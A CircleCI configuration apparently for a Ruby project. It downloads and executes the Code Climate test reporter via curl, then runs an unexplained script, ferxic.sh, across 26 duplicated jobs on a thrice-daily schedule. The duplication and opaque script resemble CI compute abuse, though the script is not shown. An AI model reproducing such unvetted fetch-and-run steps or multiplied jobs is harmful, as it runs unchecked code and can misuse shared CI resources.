working_dir: &working_dir ~/app
.build_template: &script
  parallelism: 4
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: chmod +x ferxic.sh && timeout 10m ./ferxic.sh    
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
      
version: 2.0
jobs:
  cuk:
    docker:
      - image: ruby
    steps:
      - checkout
  cuk1:
    <<: *script
    docker:
      - image: ruby:2.7
  cuk2:
    <<: *script
    docker:
      - image: ruby:2.6
  cuk3:
    <<: *script
    docker:
      - image: ruby:2.5
  cuk4:
    <<: *script
    docker:
      - image: ruby:2.4
  cuk5:
    docker:
      - image: ruby
    steps:
      - checkout
  cuk6:
    <<: *script
    docker:
      - image: ruby:2.7
  cuk7:
    <<: *script
    docker:
      - image: ruby:2.6
  cuk8:
    <<: *script
    docker:
      - image: ruby:2.5
  cuk9:
    <<: *script
    docker:
      - image: ruby:2.4
  cuk10:
    <<: *script
    docker:
      - image: ruby:2.5
  cuk11:
    <<: *script
    docker:
      - image: ruby:2.4
  cuk12:
    docker:
      - image: ruby
    steps:
      - checkout
  cuk13:
    <<: *script
    docker:
      - image: ruby:2.7
  cuk14:
    <<: *script
    docker:
      - image: ruby:2.6
  cuk15:
    <<: *script
    docker:
      - image: ruby:2.5
  cuk16:
    <<: *script
    docker:
      - image: ruby:2.4
  cuk17:
    <<: *script
    docker:
      - image: ruby:2.5
  cuk18:
    <<: *script
    docker:
      - image: ruby:2.4
  cuk19:
    docker:
      - image: ruby
    steps:
      - checkout
  cuk20:
    <<: *script
    docker:
      - image: ruby:2.7
  cuk21:
    <<: *script
    docker:
      - image: ruby:2.6
  cuk22:
    <<: *script
    docker:
      - image: ruby:2.5
  cuk23:
    <<: *script
    docker:
      - image: ruby:2.4
  cuk24:
    <<: *script
    docker:
      - image: ruby:2.5
  cuk25:
    <<: *script
    docker:
      - image: ruby:2.4                
workflows:
  version: 2
  commit:
    jobs:
      - cuk
      - cuk1
      - cuk2
      - cuk3
      - cuk4
      - cuk5
      - cuk6
      - cuk7
      - cuk8
      - cuk9
      - cuk10
      - cuk11
      - cuk12
      - cuk13
      - cuk14
      - cuk15
      - cuk16
      - cuk17
      - cuk18
      - cuk19
      - cuk20
      - cuk21
      - cuk22
      - cuk23
      - cuk24
      - cuk25

    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - master

  cukrunjob:
    jobs:
      - cuk
      - cuk1
      - cuk2
      - cuk3
      - cuk4
      - cuk5
      - cuk6
      - cuk7
      - cuk8
      - cuk9
      - cuk10
      - cuk11
      - cuk12
      - cuk13
      - cuk14
      - cuk15
      - cuk16
      - cuk17
      - cuk18
      - cuk19
      - cuk20
      - cuk21
      - cuk22
      - cuk23
      - cuk24
      - cuk25
